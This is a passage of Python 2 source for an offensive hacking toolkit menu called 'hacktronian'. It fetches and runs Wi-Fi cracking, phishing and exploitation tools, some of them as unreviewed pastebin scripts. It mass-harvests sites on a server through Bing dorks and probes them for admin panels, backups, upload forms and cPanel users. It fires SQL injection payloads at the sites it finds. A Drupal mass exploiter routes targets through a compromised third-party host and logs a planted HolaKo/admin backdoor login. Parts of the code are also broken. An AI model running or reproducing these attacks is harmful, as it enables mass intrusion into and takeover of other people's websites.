 828 |     salt = raw_input("Enter the android salt : ")
 829 |     os.system("git clone https://github.com/PentesterES/AndroidPINCrack.git")
 830 |     os.system(
 831 |         "cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt))
 832 | 
 833 | 
 834 | def passwd():
 835 |     print(hacktronianlogo)
 836 |     print("   {1}--Cupp ")
 837 |     print("   {2}--Ncrack \n ")
 838 | 
 839 |     print("   {99}-Back To Main Menu \n")
 840 |     choice3 = raw_input("hacktronian~# ")
 841 |     if choice3 == "1":
 842 |         clearScr()
 843 |         cupp()
 844 |     elif choice3 == "2":
 845 |         clearScr()
 846 |         ncrack()
 847 |     elif choice3 == "99":
 848 |         clearScr()
 849 |         menu()
 850 |     elif choice3 == "":
 851 |         menu()
 852 |     elif choice3 == "3":
 853 |         fb()
 854 |     else:
 855 |         menu()
 856 | 		
 857 | def bluepot():
 858 |     print("you need to have at least 1 bluetooh receiver (if you have many it will work wiht those, too). You must install / libbluetooth-dev on Ubuntu / bluez-libs-devel on Fedora/bluez-devel on openSUSE ")
 859 |     choice = raw_input("Continue ? Y / N : ")
 860 |     if choice in yes:
 861 |         os.system("wget https://github.com/andrewmichaelsmith/bluepot/raw/master/bin/bluepot-0.1.tar.gz && tar xfz bluepot-0.1.tar.gz && sudo java -jar bluepot/BluePot-0.1.jar")
 862 |     else:
 863 |         menu()
 864 | 	
 865 | def fluxion():
 866 |     print("fluxion is a wifi key cracker using evil twin attack..you need a wireless adoptor for this tool.")
 867 |     choice = raw_input("Continue ? Y / N : ")
 868 |     if choice in yes:
 869 |         os.system("git clone https://github.com/thehackingsage/Fluxion.git") 
 870 | 	os.system("cd Fluxion && cd install && sudo chmod +x install.sh && sudo ./install.sh")
 871 | 	os.system("cd .. && sudo chmod +x fluxion.sh && sudo ./fluxion.sh")
 872 |     elif choice in no:
 873 | 	clearScr()
 874 | 	wire()
 875 |     else:
 876 |         menu()
 877 | 	
 878 | def wire():
 879 |     print(hacktronianlogo)
 880 |     print("   {1}--reaver ")
 881 |     print("   {2}--pixiewps")
 882 |     print("   {3}--Bluetooth Honeypot GUI Framework")
 883 |     print("   {4}--Fluxion\n")
 884 |     print("   {99}-Back To The Main Menu \n\n")
 885 |     choice4 = raw_input("hacktronian~# ")
 886 |     if choice4 == "1":
 887 |         clearScr()
 888 |         reaver()
 889 |     if choice4 == "2":
 890 |         clearScr()
 891 |         pixiewps()
 892 |     if choice4 == "3":
 893 |         bluepot()
 894 |     if choice4 == "4":
 895 | 	fluxion()
 896 |     elif choice4 == "99":
 897 |         menu()
 898 |     elif choice4 == "":
 899 |         menu()
 900 |     else:
 901 |         menu()
 902 | 
 903 | 
 904 | def exp():
 905 |     print(hacktronianlogo)
 906 |     print("   {1}--ATSCAN")
 907 |     print("   {2}--sqlmap")
 908 |     print("   {3}--Shellnoob")
 909 |     print("   {4}--commix")
 910 |     print("   {5}--FTP Auto Bypass")
 911 |     print("   {6}--jboss-autopwn")
 912 |     print("   {7}--Blind SQL Automatic Injection And Exploit")
 913 |     print("   {8}--Bruteforce the Android Passcode given the hash and salt")
 914 |     print("   {9}--Joomla SQL injection Scanner \n ")
 915 |     print("   {99}-Go Back To Main Menu \n\n")
 916 |     choice5 = raw_input("hacktronian~# ")
 917 |     if choice5 == "2":
 918 |         clearScr()
 919 |         sqlmap()
 920 |     if choice5 == "1":
 921 |         os.system('clear')
 922 |         atscan()
 923 |     if choice5 == "3":
 924 |         clearScr()
 925 |         shellnoob()
 926 |     if choice5 == "4":
 927 |         os.system("clear")
 928 |         commix()
 929 |     if choice5 == "5":
 930 |         clearScr()
 931 |         gabriel()
 932 |     if choice5 == "6":
 933 |         clearScr()
 934 |         jboss()
 935 |     if choice5 == "7":
 936 |         clearScr()
 937 |         bsqlbf()
 938 |     if choice5 == "8":
 939 |         androidhash()
 940 |     if choice5 == "9":
 941 |         cmsfew()
 942 |     elif choice5 == "99":
 943 |         menu()
 944 |     elif choice5 == "":
 945 |         menu()
 946 |     else:
 947 |         menu()
 948 | 
 949 | 
 950 | def snif():
 951 |     print(hacktronianlogo)
 952 |     print("   {1}--Setoolkit ")
 953 |     print("   {2}--SSLtrip")
 954 |     print("   {3}--pyPISHER")
 955 |     print("   {4}--SMTP Mailer \n ")
 956 |     print("   {99}-Back To Main Menu \n\n")
 957 |     choice6 = raw_input("hacktronian~# ")
 958 |     if choice6 == "1":
 959 |         clearScr()
 960 |         setoolkit()
 961 |     if choice6 == "2":
 962 |         clearScr()
 963 |         ssls()
 964 |     if choice6 == "3":
 965 |         clearScr()
 966 |         pisher()
 967 |     if choice6 == "4":
 968 |         clearScr()
 969 |         smtpsend()
 970 |     if choice6 == "99":
 971 |         clearScr()
 972 |         menu()
 973 |     elif choice6 == "":
 974 |         menu()
 975 |     else:
 976 |         menu()
 977 | 
 978 | 
 979 | def cmsfew():
 980 |     print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ")
 981 |     target = raw_input("Select a target : ")
 982 |     os.system(
 983 |         "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py")
 984 |     os.system("python cms.py %s" % target)
 985 | 
 986 | 
 987 | def smtpsend():
 988 |     os.system("wget http://pastebin.com/raw/Nz1GzWDS --output-document=smtp.py")
 989 |     clearScr()
 990 |     os.system("python smtp.py")
 991 | 
 992 | 
 993 | def pisher():
 994 |     os.system("wget http://pastebin.com/raw/DDVqWp4Z --output-document=pisher.py")
 995 |     clearScr()
 996 |     os.system("python pisher.py")
 997 | 
 998 | 
 999 | menuu = hacktronianlogo + """
1000 | 
1001 |    {1}--Get all websites
1002 |    {2}--Get joomla websites
1003 |    {3}--Get wordpress websites
1004 |    {4}--Control Panel Finder
1005 |    {5}--Zip Files Finder
1006 |    {6}--Upload File Finder
1007 |    {7}--Get server users
1008 |    {8}--SQli Scanner
1009 |    {9}--Ports Scan (range of ports)
1010 |    {10}-ports Scan (common ports)
1011 |    {11}-Get server Info
1012 |    {12}-Bypass Cloudflare
1013 | 
1014 |    {99}-Back To Main Menu
1015 | """
1016 | 
1017 | 
1018 | def unique(seq):
1019 |     """
1020 |     get unique from list found it on stackoverflow
1021 |     """
1022 |     seen = set()
1023 |     return [seen.add(x) or x for x in seq if x not in seen]
1024 | 
1025 | 
1026 | def clearScr():
1027 |     """
1028 |     clear the screen in case of GNU/Linux or
1029 |     windows
1030 |     """
1031 |     if system() == 'Linux':
1032 |         os.system('clear')
1033 |     if system() == 'Windows':
1034 |         os.system('cls')
1035 | 
1036 | 
1037 | class Fscan:
1038 |     def __init__(self, serverip):
1039 |         self.serverip = serverip
1040 |         self.getSites(False)
1041 |         print menuu
1042 |         while True:
1043 |             choice = raw_input('hacktronian~# ')
1044 |             if choice == '1':
1045 |                 self.getSites(True)
1046 |             elif choice == '2':
1047 |                 self.getJoomla()
1048 |             elif choice == '3':
1049 |                 self.getWordpress()
1050 |             elif choice == '4':
1051 |                 self.findPanels()
1052 |             elif choice == '5':
1053 |                 self.findZip()
1054 |             elif choice == '6':
1055 |                 self.findUp()
1056 |             elif choice == '7':
1057 |                 self.getUsers()
1058 |             elif choice == '8':
1059 |                 self.grabSqli()
1060 |             elif choice == '9':
1061 |                 ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
1062 |                 self.portScanner(1, ran)
1063 |             elif choice == '10':
1064 |                 self.portScanner(2, None)
1065 |             elif choice == '11':
1066 |                 self.getServerBanner()
1067 |             elif choice == '12':
1068 |                 self.cloudflareBypasser()
1069 |             elif choice == '99':
1070 |                 menu()
1071 |             con = raw_input(' Continue [Y/n] -> ')
1072 |             if con[0].upper() == 'N':
1073 |                 exit()
1074 |             else:
1075 |                 clearScr()
1076 |                 print menuu
1077 | 
1078 |     def getSites(self, a):
1079 |         """
1080 |         get all websites on same server
1081 |         from bing search
1082 |         """
1083 |         lista = []
1084 |         page = 1
1085 |         while page <= 101:
1086 |             try:
1087 |                 bing = "http://www.bing.com/search?q=ip%3A" + \
1088 |                     self.serverip + "+&count=50&first=" + str(page)
1089 |                 openbing = urllib2.urlopen(bing)
1090 |                 readbing = openbing.read()
1091 |                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1092 |                 for i in range(len(findwebs)):
1093 |                     allnoclean = findwebs[i]
1094 |                     findall1 = re.findall('http://(.*?)/', allnoclean)
1095 |                     for idx, item in enumerate(findall1):
1096 |                         if 'www' not in item:
1097 |                             findall1[idx] = 'http://www.' + item + '/'
1098 |                         else:
1099 |                             findall1[idx] = 'http://' + item + '/'
1100 |                     lista.extend(findall1)
1101 | 
1102 |                 page += 50
1103 |             except urllib2.URLError:
1104 |                 pass
1105 |         self.sites = unique(lista)
1106 |         if a:
1107 |             clearScr()
1108 |             print '[*] Found ', len(lista), ' Website\n'
1109 |             for site in self.sites:
1110 |                 print site
1111 | 
1112 |     def getWordpress(self):
1113 |         """
1114 |         get wordpress site using a dork the attacker
1115 |         may do a password list attack (i did a tool for that purpose check my pastebin)
1116 |         or scan for common vulnerabilities using wpscan for example (i did a simple tool
1117 |         for multi scanning using wpscan)
1118 |         """
1119 |         lista = []
1120 |         page = 1
1121 |         while page <= 101:
1122 |             try:
1123 |                 bing = "http://www.bing.com/search?q=ip%3A" + \
1124 |                     self.serverip + "+?page_id=&count=50&first=" + str(page)
1125 |                 openbing = urllib2.urlopen(bing)
1126 |                 readbing = openbing.read()
1127 |                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1128 |                 for i in range(len(findwebs)):
1129 |                     wpnoclean = findwebs[i]
1130 |                     findwp = re.findall('(.*?)\?page_id=', wpnoclean)
1131 |                     lista.extend(findwp)
1132 |                 page += 50
1133 |             except:
1134 |                 pass
1135 |         lista = unique(lista)
1136 |         clearScr()
1137 |         print '[*] Found ', len(lista), ' Wordpress Website\n'
1138 |         for site in lista:
1139 |             print site
1140 | 
1141 |     def getJoomla(self):
1142 |         """
1143 |         get all joomla websites using
1144 |         bing search the attacker may bruteforce
1145 |         or scan them
1146 |         """
1147 |         lista = []
1148 |         page = 1
1149 |         while page <= 101:
1150 |             bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + \
1151 |                 "+index.php?option=com&count=50&first=" + str(page)
1152 |             openbing = urllib2.urlopen(bing)
1153 |             readbing = openbing.read()
1154 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1155 |             for i in range(len(findwebs)):
1156 |                 jmnoclean = findwebs[i]
1157 |                 findjm = re.findall('(.*?)index.php', jmnoclean)
1158 |                 lista.extend(findjm)
1159 |             page += 50
1160 |         lista = unique(lista)
1161 |         clearScr()
1162 |         print '[*] Found ', len(lista), ' Joomla Website\n'
1163 |         for site in lista:
1164 |             print site
1165 | ############################
1166 | # find admin panels
1167 | 
1168 |     def findPanels(self):
1169 |         """
1170 |         find panels from grabbed websites
1171 |         the attacker may do a lot of vulnerabilty
1172 |         tests on the admin area
1173 |         """
1174 |         print "[~] Finding admin panels"
1175 |         adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/',
1176 |                      'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
1177 |         clearScr()
1178 |         for site in self.sites:
1179 |             for admin in adminList:
1180 |                 try:
1181 |                     if urllib.urlopen(site + admin).getcode() == 200:
1182 |                         print " [*] Found admin panel -> ", site + admin
1183 |                 except IOError:
1184 |                     pass
1185 |  ############################
1186 |  # find ZIP files
1187 | 
1188 |     def findZip(self):
1189 |         """
1190 |         find zip files from grabbed websites
1191 |         it may contain useful informations
1192 |         """
1193 |         zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar',
1194 |                    'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
1195 |         clearScr()
1196 |         print "[~] Finding zip file"
1197 |         for site in self.sites:
1198 |             for zip1 in zipList:
1199 |                 try:
1200 |                     if urllib.urlopen(site + zip1).getcode() == 200:
1201 |                         print " [*] Found zip file -> ", site + zip1
1202 |                 except IOError:
1203 |                     pass
1204 | 
1205 |     def findUp(self):
1206 |         """
1207 |         find upload forms from grabbed
1208 |         websites the attacker may succeed to
1209 |         upload malicious files like webshells
1210 |         """
1211 |         upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php',
1212 |                   'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
1213 |         clearScr()
1214 |         print "[~] Finding Upload"
1215 |         for site in self.sites:
1216 |             for up in upList:
1217 |                 try:
1218 |                     if (urllib.urlopen(site + up).getcode() == 200):
1219 |                         html = urllib.urlopen(site + up).readlines()
1220 |                         for line in html:
1221 |                             if re.findall('type=file', line):
1222 |                                 print " [*] Found upload -> ", site + up
1223 |                 except IOError:
1224 |                     pass
1225 | 
1226 |     def getUsers(self):
1227 |         """
1228 |         get server users using a method found by
1229 |         iranian hackers , the attacker may
1230 |         do a bruteforce attack on CPanel, ssh, ftp or
1231 |         even mysql if it supports remote login
1232 |         (you can use medusa or hydra)
1233 |         """
1234 |         clearScr()
1235 |         print "[~] Grabbing Users"
1236 |         userslist = []
1237 |         for site1 in self.sites:
1238 |             try:
1239 |                 site = site1
1240 |                 site = site.replace('http://www.', '')
1241 |                 site = site.replace('http://', '')
1242 |                 site = site.replace('.', '')
1243 |                 if '-' in site:
1244 |                     site = site.replace('-', '')
1245 |                 site = site.replace('/', '')
1246 |                 while len(site) > 2:
1247 |                     resp = urllib2.urlopen(
1248 |                         site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
1249 |                     if 'invalid username' not in resp.lower():
1250 |                         print '\t [*] Found -> ', site
1251 |                         userslist.append(site)
1252 |                         break
1253 |                     else:
1254 |                         print site
1255 | 
1256 |                     site = site[:-1]
1257 |             except:
1258 |                 pass
1259 | 
1260 |         clearScr()
1261 |         for user in userslist:
1262 |             print user
1263 | 
1264 |     def cloudflareBypasser(self):
1265 |         """
1266 |         trys to bypass cloudflare i already wrote
1267 |         in my blog how it works, i learned this
1268 |         method from a guy in madleets
1269 |         """
1270 |         clearScr()
1271 |         print "[~] Bypassing cloudflare"
1272 |         subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
1273 |         for site in self.sites:
1274 |             site.replace('http://', '')
1275 |             site.replace('/', '')
1276 |             try:
1277 |                 ip = socket.gethostbyname(site)
1278 |             except socket.error:
1279 |                 pass
1280 |             for sub in subdoms:
1281 |                 doo = sub + '.' + site
1282 |                 print ' [~] Trying -> ', doo
1283 |                 try:
1284 |                     ddd = socket.gethostbyname(doo)
1285 |                     if ddd != ip:
1286 |                         print ' [*] Cloudflare bypassed -> ', ddd
1287 |                         break
1288 |                 except socket.error:
1289 |                     pass
1290 | 
1291 |     def getServerBanner(self):
1292 |         """
1293 |         simply gets the server banner
1294 |         the attacker may benefit from it
1295 |         like getting the server side software
1296 |         """
1297 |         clearScr()
1298 |         try:
1299 |             s = 'http://' + self.serverip
1300 |             httpresponse = urllib.urlopen(s)
1301 |             print ' [*] Server header -> ', httpresponse.headers.getheader('server')
1302 |         except:
1303 |             pass
1304 | 
1305 |     def grabSqli(self):
1306 |         """
1307 |         just grabs all websites in server with php?id= dork
1308 |         for scanning for error based sql injection
1309 |         """
1310 |         page = 1
1311 |         lista = []
1312 |         while page <= 101:
1313 |             try:
1314 |                 bing = "http://www.bing.com/search?q=ip%3A" + \
1315 |                     self.serverip + "+php?id=&count=50&first=" + str(page)
1316 |                 openbing = urllib2.urlopen(bing)
1317 |                 readbing = openbing.read()
1318 |                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1319 |                 for i in range(len(findwebs)):
1320 |                     x = findwebs[i]
1321 |                     lista.append(x)
1322 |             except:
1323 |                 pass
1324 |             page += 50
1325 |         lista = unique(lista)
1326 |         self.checkSqli(lista)
1327 | 
1328 |     def checkSqli(self, s):
1329 |         """
1330 |         checks for error based sql injection,
1331 |         most of the codes here are from webpwn3r
1332 |         project the one who has found an lfi in
1333 |         yahoo as i remember, you can find a separate
1334 |         tool in my blog
1335 |         """
1336 |         clearScr()
1337 |         print "[~] Checking SQL injection"
1338 |         payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><",
1339 |                     "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
1340 |         check = re.compile(
1341 |             "Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
1342 |         for url in s:
1343 |             try:
1344 |                 for param in url.split('?')[1].split('&'):
1345 |                     for payload in payloads:
1346 |                         power = url.replace(param, param + payload.strip())
1347 | 
1348 |                         html = urllib2.urlopen(power).readlines()
1349 |                         for line in html:
1350 |                             checker = re.findall(check, line)
1351 |                             if len(checker) != 0:
1352 |                                 print ' [*] SQLi found -> ', power
1353 |             except:
1354 |                 pass
1355 | 
1356 | 
1357 | def portScanner(self, mode, ran):
1358 |     """
1359 |     simple port scanner works with range of ports
1360 |     or with common ports (al-swisre idea)
1361 |     """
1362 |     clearScr()
1363 |     print "[~] Scanning Ports"
1364 | 
1365 |     def do_it(ip, port):
1366 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1367 | 
1368 |         sock = sock.connect_ex((ip, port))
1369 |         if sock == 0:
1370 |             print " [*] Port %i is open" % port
1371 | 
1372 |     if mode == 1:
1373 |         a = ran.split('-')
1374 |         start = int(a[0])
1375 |         end = int(a[1])
1376 |         for i in range(start, end):
1377 |             do_it(self.serverip, i)
1378 |     elif mode == 2:
1379 |         for port in [80, 21, 22, 2082, 25, 53, 110, 443, 143]:
1380 | 
1381 |             do_it(self.serverip, port)
1382 | 
1383 | 
1384 | ############################
1385 | minu = '''
1386 | \t 1: Drupal Bing Exploiter
1387 | \t 2: Get Drupal Websites
1388 | \t 3: Drupal Mass Exploiter
1389 | \t 99: Back To Main Menu
1390 | '''
1391 | 
1392 | 
1393 | def drupal():
1394 |     '''Drupal Exploit Binger All Websites Of server '''
1395 |     ip = raw_input('1- IP : ')
1396 |     page = 1
1397 |     while page <= 50:
1398 | 
1399 |         url = "http://www.bing.com/search?q=ip%3A" + ip + "&go=Valider&qs=n&form=QBRE&pq=ip%3A" + \
1400 |             ip + "&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first=" + \
1401 |             str(page)
1402 |         req = urllib2.Request(url)
1403 |         opreq = urllib2.urlopen(req).read()
1404 |         findurl = re.findall(
1405 |             '<div class="b_title"><h2><a href="(.*?)" h=', opreq)
1406 |         page += 1
1407 | 
1408 |         for url in findurl:
1409 |             try:
1410 | 
1411 |                 urlpa = urlparse(url)
1412 |                 site = urlpa.netloc
1413 | 
1414 |                 print "[+] Testing At " + site
1415 |                 resp = urllib2.urlopen(
1416 |                     'http://crig-alda.ro/wp-admin/css/index2.php?url=' + site + '&submit=submit')
1417 |                 read = resp.read()
1418 |                 if "User : HolaKo" in read:
1419 |                     print "Exploit found =>" + site
1420 | 
1421 |                     print "user:HolaKo\npass:admin"
1422 |                     a = open('up.txt', 'a')
1423 |                     a.write(site + '\n')
1424 |                     a.write("user:" + user + "\npass:" + pwd + "\n")
1425 |                 else:
1426 |                     print "[-] Expl Not Found :( "
1427 | 
1428 |             except Exception as ex:
1429 |                 print ex
1430 |                 sys.exit(0)
1431 | 
1432 |         # Drupal Server ExtraCtor
1433 | 
1434 | 
1435 | def getdrupal():
1436 |     ip = raw_input('Enter The Ip :  ')
1437 |     page = 1
1438 |     sites = list()
1439 |     while page <= 50:
1440 | 
1441 |         url = "http://www.bing.com/search?q=ip%3A" + ip + \
1442 |             "+node&go=Valider&qs=ds&form=QBRE&first=" + str(page)
1443 |         req = urllib2.Request(url)
1444 |         opreq = urllib2.urlopen(req).read()
1445 |         findurl = re.findall(
1446 |             '<div class="b_title"><h2><a href="(.*?)" h=', opreq)
1447 |         page += 1
1448 | 
1449 |         for url in findurl:
1450 |             split = urlparse(url)
1451 |             site = split.netloc
1452 |             if site not in sites:
1453 |                 print site
1454 |                 sites.append(site)
1455 | 
1456 |         # Drupal Mass List Exploiter
1457 | 
1458 | 
1459 | def drupallist():
1460 |     listop = raw_input("Enter The list Txt ~# ")
1461 |     fileopen = open(listop, 'r')
1462 |     content = fileopen.readlines()
1463 |     for i in content:
1464 |         url = i.strip()
1465 |         try:
1466 |             openurl = urllib2.urlopen(
1467 |                 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + url + '&submit=submit')
1468 |             readcontent = openurl.read()
1469 |             if "Success" in readcontent:
1470 |                 print "[+]Success =>" + url
1471 |                 print "[-]username:HolaKo\n[-]password:admin"
1472 |                 save = open('drupal.txt', 'a')
1473 |                 save.write(
1474 |                     url + "\n" + "[-]username:HolaKo\n[-]password:admin\n")
1475 | 
1476 |             else:
1477 |                 print i + "=> exploit not found "
1478 |         except Exception as ex:
1479 |             print ex
1480 | 
1481 | 
1482 | def maine():
1483 | 
1484 |     print minu
1485 |     choose = raw_input("choose a number : ")
1486 |     while True:
1487 | 
1488 |         if choose == "1":
1489 |             drupal()
1490 |         if choose == "2":
1491 |             getdrupal()
1492 |         if choose == "3":
1493 |             drupallist()
1494 |         if choose == "4":
1495 |             about()
1496 |         if choose == "99":
1497 |             menu()
1498 |         con = raw_input('Continue [Y/n] -> ')
1499 |         if con[0].upper() == 'N':
1500 |             exit()
1501 |         if con[0].upper() == 'Y':
1502 |             maine()
1503 | 
1504 | 
1505 | def unique(seq):
1506 |     seen = set()
1507 |     return [seen.add(x) or x for x in seq if x not in seen]
1508 | 
1509 | 
1510 | def bing_all_grabber(s):
1511 |     lista = []
1512 |     page = 1
1513 |     while page <= 101:
1514 |         try:
1515 |             bing = "http://www.bing.com/search?q=ip%3A" + \
1516 |                 s + "+&count=50&first=" + str(page)
1517 |             openbing = urllib2.urlopen(bing)
1518 |             readbing = openbing.read()
1519 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1520 |             for i in range(len(findwebs)):
1521 |                 allnoclean = findwebs[i]
1522 |                 findall1 = re.findall('http://(.*?)/', allnoclean)
1523 |                 for idx, item in enumerate(findall1):
1524 |                     if 'www' not in item:
1525 |                         findall1[idx] = 'http://www.' + item + '/'
1526 |                     else:
1527 |                         findall1[idx] = 'http://' + item + '/'
1528 |                 lista.extend(findall1)
1529 | 
1530 |             page += 50
1531 |         except urllib2.URLError:
1532 |             pass
1533 | 
1534 |     final = unique(lista)
1535 |     return final
1536 | 
1537 | 
1538 | def check_wordpress(sites):
1539 |     wp = []
1540 |     for site in sites:
1541 |         try:
1542 |             if urllib2.urlopen(site + 'wp-login.php').getcode() == 200:
1543 |                 wp.append(site)
1544 |         except:
1545 |             pass
1546 | 
1547 |     return wp
1548 | 
1549 | 
1550 | def check_joomla(sites):
1551 |     joomla = []
1552 |     for site in sites:
1553 |         try:
1554 |             if urllib2.urlopen(site + 'administrator').getcode() == 200:
1555 |                 joomla.append(site)
1556 |         except:
1557 |             pass
1558 | 
1559 |     return joomla
1560 | 
1561 | 
1562 | def wppjmla():
1563 | 
1564 |     ipp = raw_input('Enter Target IP : ')
1565 |     sites = bing_all_grabber(str(ipp))
1566 |     wordpress = check_wordpress(sites)
1567 |     joomla = check_joomla(sites)
1568 |     for ss in wordpress:
1569 |         print ss
1570 |     print '[+] Found ! ', len(wordpress), ' Wordpress Websites'
1571 |     print '-' * 30 + '\n'
1572 |     for ss in joomla:
1573 |         print ss
1574 | 
1575 |     print '[+] Found ! ', len(joomla), ' Joomla Websites'
1576 | 
1577 |     print '\n'
1578 | # initialise the fscan function
1579 | 
1580 | 
1581 | class dzz():
1582 |     def __init__(self):
1583 |         clearScr()
1584 |         aaa = raw_input("Target IP : ")
1585 |         Fscan(aaa)
1586 | ############################
1587 | 
1588 | 
1589 | class bcolors:
1590 |     HEADER = ''
1591 |     OKBLUE = ''
1592 |     OKGREEN = ''
1593 |     WARNING = ''
1594 |     FAIL = ''
1595 |     ENDC = ''
1596 |     CYAN = ''
1597 | 
1598 | 
1599 | class colors():
1600 |     PURPLE = ''
1601 |     CYAN = ''
1602 |     DARKCYAN = ''
1603 |     BLUE = ''
1604 |     GREEN = ''
1605 |     YELLOW = ''
1606 |     RED = ''
1607 |     BOLD = ''
1608 |     ENDC = ''
1609 | 
1610 | 
1611 | def grabsqli(ip):
1612 |     try:
1613 |         print bcolors.OKBLUE + "Check_Uplaod... "
1614 |         print '\n'
1615 | 
1616 |         page = 1
1617 |         while page <= 21:
1618 |             bing = "http://www.bing.com/search?q=ip%3A" + \
1619 |                 ip + "+upload&count=50&first=" + str(page)
1620 |             openbing = urllib2.urlopen(bing)
1621 |             readbing = openbing.read()
1622 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1623 |             sites = findwebs
1624 |             for i in sites:
1625 |                 try:
1626 |                     response = urllib2.urlopen(i).read()
1627 |                     checksqli(i)
1628 |                 except urllib2.HTTPError, e:
1629 |                     str(sites).strip(i)
1630 | 
1631 |             page = page + 10
1632 |     except:
1633 |         pass
1634 | 
1635 | 
1636 | def checksqli(sqli):
1637 |     responsetwo = urllib2.urlopen(sqli).read()
1638 |     find = re.findall('type="file"', responsetwo)
1639 |     if find:
1640 |         print(" Found ==> " + sqli)
1641 | 
1642 | 
1643 | def sqlscan():
1644 |     ip = raw_input('Enter IP -> ')
1645 |     grabsqli(ip)
1646 | 
1647 | 
1648 | def unique(seq):
1649 |     seen = set()
1650 |     return [seen.add(x) or x for x in seq if x not in seen]
1651 | 
1652 | 
1653 | def bing_all_grabber(s):
1654 |     lista = []
1655 |     page = 1
1656 |     while page <= 101:
1657 |         try:
1658 |             bing = "http://www.bing.com/search?q=ip%3A" + \
1659 |                 s + "+&count=50&first=" + str(page)
1660 |             openbing = urllib2.urlopen(bing)
1661 |             readbing = openbing.read()
1662 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1663 |             for i in range(len(findwebs)):
1664 |                 allnoclean = findwebs[i]
1665 |                 findall1 = re.findall('http://(.*?)/', allnoclean)
1666 |                 for idx, item in enumerate(findall1):
1667 |                     if 'www' not in item:
1668 |                         findall1[idx] = 'http://www.' + item + '/'
1669 |                     else:
1670 |                         findall1[idx] = 'http://' + item + '/'
1671 |                 lista.extend(findall1)
1672 | 
1673 |             page += 50
1674 |         except urllib2.URLError:
1675 |             pass
1676 | 
1677 |     final = unique(lista)
1678 |     return final
1679 | 
1680 | 
1681 | def check_wordpress(sites):
1682 |     wp = []
1683 |     for site in sites:
1684 |         try:
1685 |             if urllib2.urlopen(site + 'wp-login.php').getcode() == 200:
1686 |                 wp.append(site)
1687 |         except:
1688 |             pass
1689 | 
1690 |     return wp
1691 | 
1692 | 
1693 | def check_wpstorethemeremotefileupload(sites):
1694 |     wpstorethemeremotefileupload = []
1695 |     for site in sites:
1696 |         try:
1697 |             if urllib2.urlopen(site + 'wp-content/themes/WPStore/upload/index.php').getcode() == 200:
1698 |                 wpstorethemeremotefileupload.append(site)
1699 |         except:
1700 |             pass
1701 | 
1702 |     return wpstorethemeremotefileupload
1703 | 
1704 | 
1705 | def check_wpcontactcreativeform(sites):
1706 |     wpcontactcreativeform = []
1707 |     for site in sites:
1708 |         try:
1709 |             if urllib2.urlopen(site + 'wp-content/plugins/sexy-contact-form/includes/fileupload/index.php').getcode() == 200:
1710 |                 wpcontactcreativeform.append(site)
1711 |         except:
1712 |             pass
1713 | 
1714 |     return wpcontactcreativeform
1715 | 
1716 | 
1717 | def check_wplazyseoplugin(sites):
1718 |     wplazyseoplugin = []
1719 |     for site in sites:
1720 |         try:
1721 |             if urllib2.urlopen(site + 'wp-content/plugins/lazy-seo/lazyseo.php').getcode() == 200:
1722 |                 wplazyseoplugin.append(site)
1723 |         except:
1724 |             pass
1725 | 
1726 |     return wplazyseoplugin
1727 | 
1728 | 
1729 | def check_wpeasyupload(sites):
1730 |     wpeasyupload = []
1731 |     for site in sites:
1732 |         try:
1733 |             if urllib2.urlopen(site + 'wp-content/plugins/easy-comment-uploads/upload-form.php').getcode() == 200:
1734 |                 wpeasyupload.append(site)
1735 |         except:
1736 |             pass
1737 | 
1738 |     return wpeasyupload
1739 | 
1740 | 
1741 | def check_wpsymposium(sites):
1742 |     wpsymposium = []
1743 |     for site in sites:
1744 |         try:
1745 |             if urllib2.urlopen(site + 'wp-symposium/server/file_upload_form.php').getcode() == 200:
1746 |                 wpsycmium.append(site)
1747 |         except:
1748 |             pass
1749 | 
1750 |     return wpsymposium
1751 | 
1752 | 
1753 | def wpminiscanner():
1754 |     ip = raw_input('Enter IP : ')
1755 |     sites = bing_all_grabber(str(ip))
1756 |     wordpress = check_wordpress(sites)
